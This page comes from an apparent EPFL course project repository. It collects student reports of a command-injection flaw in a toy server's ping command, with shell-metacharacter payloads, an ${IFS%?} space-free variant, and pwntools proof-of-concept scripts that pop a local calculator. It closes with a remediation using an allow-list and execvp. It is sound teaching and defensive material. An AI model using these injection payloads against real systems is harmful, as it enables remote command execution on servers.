yannvon / grass
GRASS is buggier on the other side. EPFL semester project for the Software security class.
Vulnerability location: commands.cpp:348
Type of vulnerability: the input to the ping function is not sanitized, so we can use ; to chain commands and execute a calculator.
Exploit: after connecting to the server, the client can simply type:
ping epfl.ch;gnome-calculator
Ping function is vulnerable. There is no sanitization whatsoever of the arguments in the ping_cmd function in file commands.cpp, thus special characters such as " ` & ; (...) can be used directly to inject commands (lines 348-349).
string s = "ping -c 1 " + host;
int res = exec(s.c_str(), out);
Evidently they just concatenate the 'host' to the ping command without sanitizing and call exec, which is essentially a system call that uses popen.
It is possible to perform the following exploits without any authentication, because ping does not require it:
"ping `xcalc`" : this will open a calculator
"ping google.ch;xcalc;" : this will open a calculator
"ping &xcalc&" : this will open a calculator
(...)
Where: line 71 in a5b8f5a
They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another command (xcalc) that will be executed right after the ping.
Here is a PoC:
#!/usr/bin/env python3
from pwn import *
# Start the client against a server already listening on 127.0.0.1:1337;
# the injected command runs on the server side, not in this client.
sh = process(['./client', '127.0.0.1', '1337'])
# sendline() appends the newline itself, so the payload needs none
sh.sendline(b"ping google.ch;xcalc")
sh.interactive()
Where the vulnerability is
In the ping_cmd function, special characters (like ;, & or |) are permitted and not filtered. Moreover, the hostname is directly inserted at the end of the predefined string "ping -c 1 ". This string is then simply executed with the exec function.
Exploitation of the vulnerability
To exploit this vulnerability, it is sufficient to create a parameter of the ping command with no spaces. Since it is possible to use the internal field separator variable in a shell to "emulate" a space, we can construct an exploit just by calling ping on a random host, then use the semicolon and attach another command that executes remote code (opens a calculator).
After running the server and connecting one client, we can just type the following command on the client and open a calculator:
ping google.com;sh${IFS%?}-c${IFS%?}xcalc
which basically corresponds to execute: ping google.com;sh -c xcalc
After running make, launch the server with ./bin/server. Then launch the client with ./bin/client 127.0.0.1 1337 and feed it with
ping stuff;xcalc
which pops a calc on the server side.
Indeed, at this line https://github.com/yannvon/grass/blob/master/src/commands.cpp#L348 the user input is not escaped.
One can exploit the ping command to open a calculator using the following PoC:
from pwn import *
dirname = "."
server_bin = '/bin/server'
client_bin = '/bin/client'
# Start the server, then a client connected to it
server = process("".join([dirname, server_bin]))
client = process(["".join([dirname, client_bin]), "127.0.0.1", "1337"])
client.sendline(b"login u1")
client.sendline(b"pass p1")
# ';' terminates the (empty) ping command; the server's shell then runs xcalc
client.sendline(b"ping ;/bin/xcalc;")
# Prevent the process from stopping
pause()
What: command injection
Where: in the do_ping function
You do not sanitize the input of the do_ping function. I was then able to pop a calc.
PoC:
#!/usr/bin/env python3
from pwn import *
sh = process(['client', '127.0.0.1', '1337'])
# ${IFS%?} expands to whitespace, so the payload contains no literal space
sh.sendline(b"ping stuff;sh${IFS%?}|${IFS%?}gnome-calculator")
sh.interactive()
I am able to open a calculator when executing the ping command.
Here's a PoC:
'''
This script should be put in the yannvon/grass/ directory and run from there.
This script works on a freshly restarted Kali Linux 64 bit VM.
Do not forget to run make before running the script.
Target: https://github.com/yannvon/grass
Exploit: Command Injection - Open calc through ping command
You can also run this by hand by doing:
make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc
'''
from pwn import *
server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = b"login u1"
PASS = b"pass p1"
CMD = b"ping wowmuchinject;xcalc"
# Start the server first, then a client connected to it
server = process(server_bin)
client = process([client_bin, IP, PORT])
client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
# recvall() returns once the server closes its output (EOF)
print("SERVER: {}".format(server.recvall()))
In this project
In the ping command of this project, there is a vulnerability: if a ";" is added to the end, we can then type anything, as in a shell, on the target server.
Here you can find an example of such an attempt (this was done on my machine, where xcalc is not a recognized program):
```
login u1
pass p1
ping google.fr;xcalc
PING google.fr (172.217.168.3) 56(84) bytes of data.
64 bytes from zrh11s03-in-f3.1e100.net (172.217.168.3): icmp_seq=1 ttl=55 time=5.48 ms
--- google.fr ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 5.482/5.482/5.482/0.000 ms
sh: xcalc : command not found
```
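All of the reports above describe the same root cause: ping_cmd builds the string "ping -c 1 " + host and hands it to a shell via popen, so ";", "`", "&", and the space-free ${IFS%?} variant all reach the shell as syntax. The block below is an added example, not code from the yannvon/grass repository: it keeps the vulnerable concatenation for comparison and shows the two fixes a reviewer would ask for, an allow-list check on the hostname (rather than a block-list of ";" like the project's path "escape" function) and running ping through fork/execvp with the host as a single argv element, so no shell is involved at all. The function names (build_vulnerable_ping, is_safe_hostname, build_safe_ping_argv, safe_ping) and the sample inputs are assumptions made for this illustration.

```cpp
// Added example (not code from the yannvon/grass repository). Function names
// and inputs below are assumptions made for this illustration.
#include <cctype>
#include <cstdio>
#include <string>
#include <vector>
#include <unistd.h>
#include <sys/wait.h>

// What the reports describe: the host is concatenated into a shell command
// line that is then handed to popen(), so shell metacharacters in `host`
// become part of the command.
std::string build_vulnerable_ping(const std::string& host) {
    return "ping -c 1 " + host;   // "ping -c 1 google.ch;xcalc" also runs xcalc
}

// Allow-list check: only characters that can appear in a DNS hostname
// (letters, digits, '.', '-'), a sane length, and no leading '-' or '.' so the
// value cannot be parsed as a ping option once it is passed as an argument.
// Rejecting instead of escaping also defeats the space-free payloads above:
// '$', '{', ';' and '|' are simply not allowed, so the ${IFS%?} trick never
// reaches anything that would expand it.
bool is_safe_hostname(const std::string& host) {
    if (host.empty() || host.size() > 253) return false;
    if (host.front() == '-' || host.front() == '.') return false;
    for (unsigned char c : host) {
        if (!(std::isalnum(c) || c == '.' || c == '-')) return false;
    }
    return true;
}

// Hardened version: no shell at all. The host is one argv element, so even if
// the allow-list were relaxed, ';' or '`' would reach ping as data instead of
// being interpreted by /bin/sh. The "--" guards against option injection.
std::vector<std::string> build_safe_ping_argv(const std::string& host) {
    return {"ping", "-c", "1", "--", host};
}

// Runs the hardened argv with fork()/execvp() and returns the child's exit
// status, or -1 if the hostname is rejected or the process could not start.
int safe_ping(const std::string& host) {
    if (!is_safe_hostname(host)) return -1;
    std::vector<std::string> args = build_safe_ping_argv(host);
    std::vector<char*> argv;
    for (auto& a : args) argv.push_back(&a[0]);
    argv.push_back(nullptr);

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv.data());
        _exit(127);   // exec failed; never fall back to a shell
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main() {
    // Constructed inputs: one real hostname, the injection payloads quoted in
    // the reports above, and an option-injection attempt with no shell syntax.
    const char* inputs[] = {"epfl.ch", "google.ch;xcalc", "`xcalc`", "&xcalc&",
                            "google.com;sh${IFS%?}-c${IFS%?}xcalc", "-f"};
    for (const char* in : inputs) {
        std::printf("%-40s %s\n", in, is_safe_hostname(in) ? "accepted" : "rejected");
    }
    return 0;
}
```

The two fixes are independent and both are worth keeping: the allow-list stops bad input at the boundary, and execvp removes the shell so that a future relaxation of the filter (say, to allow IPv6 literals with ':') cannot reintroduce command injection. Note that "-f" is rejected even though it contains no shell metacharacter; without the leading-hyphen check and the "--" separator, a host value starting with '-' would be read by ping as an option.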